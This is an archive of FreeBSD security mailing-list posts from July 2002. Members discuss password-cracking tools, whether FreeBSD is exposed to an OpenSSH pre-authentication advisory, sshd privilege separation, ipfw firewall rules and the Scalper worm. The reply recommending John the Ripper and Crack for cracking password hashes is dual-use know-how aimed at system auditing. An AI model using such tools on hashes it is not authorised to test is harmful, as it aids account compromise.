Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 6:41:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3285837B400 for ; Tue, 2 Jul 2002 06:41:39 -0700 (PDT) Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by mx1.FreeBSD.org (Postfix) with ESMTP id 88B0F43E0A for ; Tue, 2 Jul 2002 06:41:38 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from famine.cs.utah.edu (famine.cs.utah.edu [155.99.198.114]) by wrath.cs.utah.edu (8.11.6/8.11.6) with ESMTP id g62DfT908553; Tue, 2 Jul 2002 07:41:30 -0600 (MDT) Received: by famine.cs.utah.edu (Postfix, from userid 2146) id 5B94623A7A; Tue, 2 Jul 2002 07:41:27 -0600 (MDT) Date: Tue, 2 Jul 2002 07:41:27 -0600 From: "David G . Andersen" To: Eric Anderson Cc: freebsd-security@FreeBSD.ORG Subject: Re: password crackers? Message-ID: <20020702074127.B21304@cs.utah.edu> References: <3D21AC48.3E2C1BC1@centtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <3D21AC48.3E2C1BC1@centtech.com>; from anderson@centtech.com on Tue, Jul 02, 2002 at 08:36:08AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Eric Anderson just mooed: > What does everyone recommend for a general password file cracker? I have been > using an old version of crack, but there must be better ones around. I need to > crack solaris, freebsd, and linux password hashes. Any recommendations? Single-host: John the Ripper http://www.openwall.com/john/ Multi-host: Probably still Crack. John will be faster on a single host than Crack on two hosts, most likely, but if you've got a host of hosts to throw at it, crack is easier to manage. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 7:12:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B790A37B400 for ; Tue, 2 Jul 2002 07:12:53 -0700 (PDT) Received: from service.sh.cvut.cz (service.sh.cvut.cz [147.32.127.214]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0B01043E0A for ; Tue, 2 Jul 2002 07:12:53 -0700 (PDT) (envelope-from M.Kozlovsky@sh.cvut.cz) Received: from veverka.sh.cvut.cz (veverka.sh.cvut.cz [147.32.127.216]) by service.sh.cvut.cz (Postfix) with ESMTP id C747A1E93C; Tue, 2 Jul 2002 16:11:51 +0200 (CEST) Received: (from buki@localhost) by veverka.sh.cvut.cz (8.9.3/8.9.2) id QAA66060; Tue, 2 Jul 2002 16:12:50 +0200 (CEST) (envelope-from buki) Date: Tue, 2 Jul 2002 16:12:50 +0200 From: Buki To: Peter Brezny Cc: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Message-ID: <20020702161250.A57959@veverka.sh.cvut.cz> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from peter@skyrunner.net on Tue, Jul 02, 2002 at 08:47:37AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 02, 2002 at 08:47:37AM -0400, Peter Brezny wrote: > I've been trying to get clear on whether or not freebsd-stable (4.6-STABLE > FreeBSD 4.6-STABLE #0: Sat Jun 29 00:37:13 EDT 2002) has resolved the > problem listed in CA-2002-18 from CERT. > > it doesn't appear so since it's running Openssh_2.9 and > http://openssh.org/txt/preauth.adv clearly says that freebsd is vulnerable. > > > I _THOUGHT_ i found something on the freebsd site stating that OpenSSH_2.9 > FreeBSD localisations 20020307 was not vulnerable, however, I can't find it > now. > > Since there doesn't appear to be a security advisory or notice from the > freebsd security team on this one yet, what's the best thing to do? the Best Thing(tm) is to stay calm :) > > Manually update to openssh 3.4? Is an update to the base system in the > works? > you may either manually upgrade to OpenSSH 3.4 (/usr/ports/security/openssh-portable) or stick with base OpenSSH 2.9 localisation 20020307 as it is secure as many people on this list said before. But YMMV. > TIA > > > Peter Brezny > Skyrunner.net > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Buki -- PGP public key: http://dev.null.cz/buki.asc /"\ \ / ASCII Ribbon Campaign X Against HTML & Outlook Mail / \ http://www.thebackrow.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 8:36:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1F1EE37B400 for ; Tue, 2 Jul 2002 08:36:06 -0700 (PDT) Received: from rack.purplecat.net (rack.purplecat.net [208.133.44.46]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6409743E09 for ; Tue, 2 Jul 2002 08:36:05 -0700 (PDT) (envelope-from peter@skyrunner.net) Received: (qmail 38065 invoked from network); 2 Jul 2002 15:36:21 -0000 Received: from unknown (HELO micron) (208.150.25.130) by mx1.skyrunner.net with SMTP; 2 Jul 2002 15:36:21 -0000 Reply-To: From: "Peter Brezny" To: "Buki" Cc: Subject: RE: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Date: Tue, 2 Jul 2002 11:33:13 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 In-Reply-To: <20020702161250.A57959@veverka.sh.cvut.cz> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Buki, Thanks very much for asuaging my fears. I looked through the security list archives for a little while looking for some more on the subject, but didn't come up with anything definitive. It would be really helpful for the security team to release an official notice letting us know that we're not in deep dodo here. It's particularly scarry when the advisories out there say there's a problem, but it's hard to find specific examples of why it's not a problem on freebsd. If you have any direct refs you could point me to, that would be great. I also need to update my knowledge of acronyms,...what's YMMV stand for? Thanks again, pb Peter Brezny Skyrunner.net -----Original Message----- From: Buki [mailto:dev@null.cz] Sent: Tuesday, July 02, 2002 10:13 AM To: Peter Brezny Cc: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response On Tue, Jul 02, 2002 at 08:47:37AM -0400, Peter Brezny wrote: > I've been trying to get clear on whether or not freebsd-stable (4.6-STABLE > FreeBSD 4.6-STABLE #0: Sat Jun 29 00:37:13 EDT 2002) has resolved the > problem listed in CA-2002-18 from CERT. > > it doesn't appear so since it's running Openssh_2.9 and > http://openssh.org/txt/preauth.adv clearly says that freebsd is vulnerable. > > > I _THOUGHT_ i found something on the freebsd site stating that OpenSSH_2.9 > FreeBSD localisations 20020307 was not vulnerable, however, I can't find it > now. > > Since there doesn't appear to be a security advisory or notice from the > freebsd security team on this one yet, what's the best thing to do? the Best Thing(tm) is to stay calm :) > > Manually update to openssh 3.4? Is an update to the base system in the > works? > you may either manually upgrade to OpenSSH 3.4 (/usr/ports/security/openssh-portable) or stick with base OpenSSH 2.9 localisation 20020307 as it is secure as many people on this list said before. But YMMV. > TIA > > > Peter Brezny > Skyrunner.net > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Buki -- PGP public key: http://dev.null.cz/buki.asc /"\ \ / ASCII Ribbon Campaign X Against HTML & Outlook Mail / \ http://www.thebackrow.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 8:41:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DB6F537B401; Tue, 2 Jul 2002 08:41:39 -0700 (PDT) Received: from corbulon.video-collage.com (corbulon.video-collage.com [64.35.99.179]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1AA3543E0A; Tue, 2 Jul 2002 08:41:39 -0700 (PDT) (envelope-from mi+mx@aldan.algebra.com) Received: from misha (250-217.customer.cloud9.net [168.100.250.217]) by corbulon.video-collage.com (8.12.2/8.12.2) with ESMTP id g62FfarE019546 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=FAIL); Tue, 2 Jul 2002 11:41:37 -0400 (EDT) (envelope-from mi+mx@aldan.algebra.com) X-Authentication-Warning: corbulon.video-collage.com: Host 250-217.customer.cloud9.net [168.100.250.217] claimed to be misha Content-Type: text/plain; charset="us-ascii" From: Mikhail Teterin Organization: Virtual Estates, Inc. To: security@FreeBSD.org, des@FreeBSD.org Subject: two sshd processes per session? Date: Tue, 2 Jul 2002 11:41:34 -0400 X-Mailer: KMail [version 1.4] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200207021141.34021.mi+mx@aldan.algebra.com> X-Scanned-By: MIMEDefang 2.15 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! With the privilege separation enabled, there are two sshd processes per each session. If, however, I kill the [priv] one after logging in, the session continues to work properly... Perhaps, the [priv] part should exit by itself? I must be missing something... Thanks! -mi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 9:12:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9B5A037B400 for ; Tue, 2 Jul 2002 09:12:29 -0700 (PDT) Received: from mail4.home.nl (mail4.home.nl [213.51.129.228]) by mx1.FreeBSD.org (Postfix) with ESMTP id A032443E2F for ; Tue, 2 Jul 2002 09:12:28 -0700 (PDT) (envelope-from marcel.dijk@home.nl) Received: from winxp ([217.120.146.224]) by mail4.home.nl (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20020702161353.IOQD4420.mail4.home.nl@winxp> for ; Tue, 2 Jul 2002 18:13:53 +0200 Message-ID: <01ea01c221e3$43a62550$0200a8c0@winxp> From: "Marcel Dijk" To: Subject: Making a firewall more closed Date: Tue, 2 Jul 2002 18:12:26 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 Disposition-Notification-To: "Marcel Dijk" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, that works! Thanks very much for your help. Now I have another problem, I can log in to an FTP site but then I get this message: 227 Entering Passive Mode (212,120,66,212,248,134) Data Socket Error: Connection Failed I think I should open ports 1024 - 65535 ? But that would mean a great security risk? Thanks, Marcel. > You forgot about DNS. If you change rule 550 from > add 550 allow log udp from me to any 21,80 keep-state out > to > add 550 allow log udp from me to any 21,53,80 keep-state out > it should work. > > You may want to find out what IPs you use for DNS, and specifically allow > those addresses. > > I loaded your rules and im not having any problems now. > > > > On Monday 01 July 2002 07:05 pm, nascar24 wrote: > > This is my current ruleset: > > > > # allow loopback traffic > > add 100 allow ip from any to any via lo0 > > > > # protect loopback address > > add 200 deny log ip from 127.0.0.1 to any > > add 249 deny log ip from any to 127.0.0.1 > > > > # block spoofs > > add 400 deny log ip from me to any in via ed0 > > > > # enable NATD > > add 425 divert 8668 ip from any to any via ed0 > > > > # check dynamic rules > > add 450 check-state > > > > # make dynamic entries for all outgoing traffic > > add 500 allow log tcp from me to any 1-65535 keep-state out > > add 550 allow log udp from me to any 1-65535 keep-state out > > > > # services we offer to the world > > add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state in > > > > # pass ICMP > > add 700 allow log icmp from me to any out > > add 750 allow log icmp from any to me in > > > > # pass everything on private LAN > > add 800 allow log all from 192.168.0.0/16 to any > > add 850 allow log all from any to 192.168.0.0/16 > > > > # log rejects that have fallen through > > add 65000 deny log ip from any to any > > > > Whith this ruleset I can browse websites, FTP sites etc. > > > > But when I replace rules 500 and 550 with this: > > > > add 500 allow log tcp from me to any 21,80 keep-state out > > add 550 allow log udp from me to any 21,80 keep-state out > > > > I cannot acces any websites nor FTP sites. But I guess I had just allowed > > it? > > > > Or is the 'out' the problem here. > > > > Marcel. > > > > On Monday 01 July 2002 06:45 pm, nascar24 wrote: > > > What I mean is that I want to grand acces to the internet. But only to > > > ports I 'trust', like 80,21,22 etc. But when I make a rule like: > > > > > > add 550 allow ip from me to any 80,21,22 > > > > > > I cannot acces a website, that puzzles me. > > > > There is a problem with the rule in the example: You allowed traffic to > > leave > > through those ports, but not to enter. We can fix this rule: > > > > add 550 allow tcp from me to any 80,21,22 keep-state > > > > I noticed you already had a rule 550 - you may want to give it a different > > number. IPFW (running 4.5R here) gives the following error when trying to > > load your rule: > > > > ipfw: only TCP and UDP protocols are valid with port specifications > > > > hence why i changed it from ip to tcp. > > > > GL > > -- > ---------- > Ramsey G. Brenner > rgbrenner@myrealbox.com > http://rgbrenner.cjb.net/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 9:24: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 31A3937B400 for ; Tue, 2 Jul 2002 09:23:58 -0700 (PDT) Received: from bluenugget.net (bluenugget.net [64.32.175.43]) by mx1.FreeBSD.org (Postfix) with ESMTP id CC78A43E09 for ; Tue, 2 Jul 2002 09:23:57 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from [10.0.0.2] (gw.bluenugget.net [64.32.175.42]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by bluenugget.net (Postfix) with ESMTP id CE0001360C; Tue, 2 Jul 2002 09:26:41 -0700 (PDT) Date: Tue, 02 Jul 2002 09:23:54 -0700 From: Jason DiCioccio Reply-To: Jason DiCioccio To: Jeff Palmer , Patrick Cahalan Cc: security@freebsd.org Subject: Re: I'll volunteer Message-ID: <2147483647.1025601834@[10.0.0.2]> In-Reply-To: <5.1.1.6.0.20020702092653.00b16128@mail.drkshdw.org> References: <5.1.1.6.0.20020702092653.00b16128@mail.drkshdw.org> X-Mailer: Mulberry/3.0.0a3 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --On Tuesday, July 2, 2002 9:33 AM -0400 Jeff Palmer wrote: > I'll second this notion, and volunteer as well. What seperates this list from BUGTRAQ is the fact that is unmoderated IMHO. It is also dealing with FreeBSD security specifically, however the fact that it's unmoderated makes it really useful in my book. I don't mind and do think that many times, there are useful arguments made in some of these long threads. Brett Glass makes some valid points as well, imho. I'm sure I'm not the only one who feels that way, but not everyone wants to admit it :).. The fact that this list is unmoderated usually means that I get my information quicker from this list than I do from bugtraq, and that is important to me and to others I'm sure. I don't have to wait for a list moderator to approve an important post. I also don't have to worry about a bias that the list moderator might have which would prevent an important post from making the list. This list goes off topic sometimes, but it's easy enough to ignore a thread. Perhaps one of these camps should start its own list, whether it's @freebsd.org or not. But I personally enjoy having an unmoderated source for security information and discussion, even if it's off topic once and a while. I hope these ramblings made some sense. Cheers, -JD- -- Jason DiCioccio - jd@bluenugget.net - Useless .sig Open Domain Service - geniusj@ods.org - http://www.ods.org/ Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/ PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 9:26:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CD00037B400 for ; Tue, 2 Jul 2002 09:26:35 -0700 (PDT) Received: from search.sparks.net (d-207-5-180-136.gwi.net [207.5.180.136]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6C68043E0A for ; Tue, 2 Jul 2002 09:26:35 -0700 (PDT) (envelope-from dmiller@sparks.net) Received: by search.sparks.net (Postfix, from userid 100) id 1D86FD984; Tue, 2 Jul 2002 12:26:17 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by search.sparks.net (Postfix) with ESMTP id 104F7D982; Tue, 2 Jul 2002 12:26:17 -0400 (EDT) Date: Tue, 2 Jul 2002 12:26:16 -0400 (EDT) From: David Miller To: Andy Farkas Cc: Kent Stewart , security@FreeBSD.ORG Subject: Re: FreeBSD.Scalper.Worm In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 30 Jun 2002, Andy Farkas wrote: > On Sat, 29 Jun 2002, Kent Stewart wrote: > > > One of the people sending mail to -docs, pointed me to > > > > http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html > > > > It looks like more exposure needs to be provided via the web site and etc. > > > > Kent > > > > -- > > Kent Stewart > > Richland, WA > > > > http://users.owt.com/kstewart/index.html > > > > Looks like this worm can be stopped by having /tmp mounted noexec. Probably not a very good solution since it could be overcome with a trivial change to the worm. The better fix is to plug the hole:) --- David To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 14:13:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1C7B037C26D for ; Tue, 2 Jul 2002 14:11:42 -0700 (PDT) Received: from smtpout.mac.com (smtpout.mac.com [204.179.120.89]) by mx1.FreeBSD.org (Postfix) with ESMTP id E09BA44271 for ; Tue, 2 Jul 2002 10:23:19 -0700 (PDT) (envelope-from wincentcolaiuta@mac.com) Received: from smtp-relay04-en1.mac.com (smtp-relay04-en1 [10.13.10.223]) by smtpout.mac.com (8.12.1/8.10.2/1.0) with ESMTP id g62HNJTQ027366 for ; Tue, 2 Jul 2002 10:23:19 -0700 (PDT) Received: from asmtp02.mac.com (asmtp02-qfe3.mac.com [10.13.10.66]) by smtp-relay04-en1.mac.com (8.12.1/8.12.1/1.0) with ESMTP id g62HNEtF008601 for ; Tue, 2 Jul 2002 10:23:14 -0700 (PDT) Received: from cannondale.elcentro.red ([202.45.118.108]) by asmtp02.mac.com (Netscape Messaging Server 4.15) with ESMTP id GYMTMN00.DG4 for ; Tue, 2 Jul 2002 10:23:11 -0700 Date: Wed, 3 Jul 2002 02:52:56 +0930 Subject: Re: security fixes Content-Type: text/plain; charset=ISO-8859-1; format=flowed Mime-Version: 1.0 (Apple Message framework v482) From: Wincent Colaiuta To: freebsd-security@freebsd.org Content-Transfer-Encoding: quoted-printable In-Reply-To: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> Message-Id: <592EA664-8DE0-11D6-A483-003065C60B4C@mac.com> X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org El Tuesday, 2 July, 2002, a las 05:37 AM, Kevin Kinsey, DaleCo, S.P.=20 escribi=F3: > Some people read the warning about -STABLE in > the Handbook (that I quoted earlier) and decide only > to run -RELEASE and patch security fixes, and > there is a cvs tag for this, called RELENG_4_x. > This is where a little confusion comes in, because > after a while they quit patching the older releases. So on production systems track RELENG_4_6 now, and when that stops being=20= updated, start tracking RELENG_4_7, and so on.... I can't see any=20 problems with that. That way you're tracking the security fixes and=20 critical patches, and then when you need to you're upgrading your entire=20= system in safe way. I think the advice to not track STABLE on production machines is good.=20= Sure, STABLE is mostly exactly that: STABLE. But there are always going=20= to be exceptions... The last thing you want is a machine that won't boot=20= after something went wrong and you have to pay $$$ to get access to the=20= datacentre and rescue the machine... Cheers Wincent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 14:14:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 39D0F37C53A for ; Tue, 2 Jul 2002 14:12:55 -0700 (PDT) Received: from newmail.skyrunner.net (newmail.skyrunner.net [208.133.44.6]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7A03443F57 for ; Tue, 2 Jul 2002 09:47:30 -0700 (PDT) (envelope-from peter@skyrunner.net) Received: from micron (athena.skyrunner.net [208.150.25.130]) by newmail.skyrunner.net (8.11.2/8.11.0/SuSE Linux 8.11.0-0.4) with SMTP id g62GmbK19244 for ; Tue, 2 Jul 2002 12:48:38 -0400 From: "Peter Brezny" To: Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Date: Tue, 2 Jul 2002 12:44:36 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org OK, so now that half the freebsd-security list has enlightened me as to what YMMV means and where it came from, I know you guys are reading this list, however, no one bothered to mention why even though openssh's statement says that freebsd has a problem with the version of ssh out there, FreeBSD actually doesn't. Could someone please point me to a specific ref. as to why freebsd's implementation of ssh is ok? I know I'm paranoid. Thanks. From: http://openssh.org/txt/preauth.adv 2. Impact: This bug can be exploited remotely if ChallengeResponseAuthentication is enabled in sshd_config. This option is enabled by default on OpenBSD and other systems. Affected are at least systems supporting s/key over SSH protocol version 2 (OpenBSD, FreeBSD and NetBSD as well as other systems supporting s/key with SSH). Exploitablitly of systems using PAMAuthenticationViaKbdInt has not been verified. Thanks for the help and the enlightening reasons of what YMMV means, Here's a good one Your Memory Might Vanish :) (it's: Your Milage May Vary) And another with a nice explanation. YMMV = "your mileage may vary" A statement often made in advertising by American automobile manufacturers stating that fuel economy in miles/gallon is variable according to driving habits, type of fuel, etc., etc., This has come to mean "I found this to be true, but you may not..." Thanks again for your help guys! Peter Brezny Skyrunner.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 14:40:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D368137C8F4 for ; Tue, 2 Jul 2002 14:39:34 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id ACB0943E39 for ; Tue, 2 Jul 2002 14:39:33 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 8CBE3534B; Tue, 2 Jul 2002 23:39:31 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Mikhail Teterin Cc: security@FreeBSD.org Subject: Re: two sshd processes per session? References: <200207021141.34021.mi+mx@aldan.algebra.com> From: Dag-Erling Smorgrav Date: 02 Jul 2002 23:39:30 +0200 In-Reply-To: <200207021141.34021.mi+mx@aldan.algebra.com> Message-ID: Lines: 13 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Mikhail Teterin writes: > With the privilege separation enabled, there are two sshd processes per > each session. If, however, I kill the [priv] one after logging in, the > session continues to work properly... Perhaps, the [priv] part should > exit by itself? I must be missing something... If you kill the monitor, you won't be able to do stuff like connect to forwarded ports etc., and your session might not be properly shut down after you disconnect. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 15:17:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D469637B401 for ; Tue, 2 Jul 2002 15:17:14 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6F5954402F for ; Tue, 2 Jul 2002 15:10:03 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA24529; Tue, 2 Jul 2002 16:06:17 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020702155758.00e9a2c0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 02 Jul 2002 16:06:13 -0600 To: Wincent Colaiuta , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: security fixes In-Reply-To: <592EA664-8DE0-11D6-A483-003065C60B4C@mac.com> References: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:22 AM 7/2/2002, Wincent Colaiuta wrote: >So on production systems track RELENG_4_6 now, and when that stops being updated, start tracking RELENG_4_7, and so on.... With the flurry of changes going on (including the OpenSSH hole and libc hole in the base install and the Apache vulnerability in the ports and packages), it'd be nice to see an interim release. Who here would be in favor of that? Who, on the FreeBSD Core Team, might make the decision to do an interim release before 4.7 (scheduled for October)? (Yes, it takes work to put out a release, but do we really want everyone who wants a secure system to have to install from -STABLE snapshots, running the risk of picking a bad day, for four months?) --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 15:29:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E3A1F37B412 for ; Tue, 2 Jul 2002 15:29:53 -0700 (PDT) Received: from corbulon.video-collage.com (corbulon.video-collage.com [64.35.99.179]) by mx1.FreeBSD.org (Postfix) with ESMTP id A896E43E09 for ; Tue, 2 Jul 2002 15:29:52 -0700 (PDT) (envelope-from mi+mx@aldan.algebra.com) Received: from misha (250-217.customer.cloud9.net [168.100.250.217]) by corbulon.video-collage.com (8.12.2/8.12.2) with ESMTP id g62MTlrE048043 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=FAIL); Tue, 2 Jul 2002 18:29:48 -0400 (EDT) (envelope-from mi+mx@aldan.algebra.com) X-Authentication-Warning: corbulon.video-collage.com: Host 250-217.customer.cloud9.net [168.100.250.217] claimed to be misha Content-Type: text/plain; charset="iso-8859-1" From: Mikhail Teterin Organization: Virtual Estates, Inc. To: Dag-Erling Smorgrav Subject: Re: two sshd processes per session? Date: Tue, 2 Jul 2002 18:29:44 -0400 X-Mailer: KMail [version 1.4] Cc: security@FreeBSD.org References: <200207021141.34021.mi+mx@aldan.algebra.com> In-Reply-To: MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200207021829.44485.mi+mx@aldan.algebra.com> X-Scanned-By: 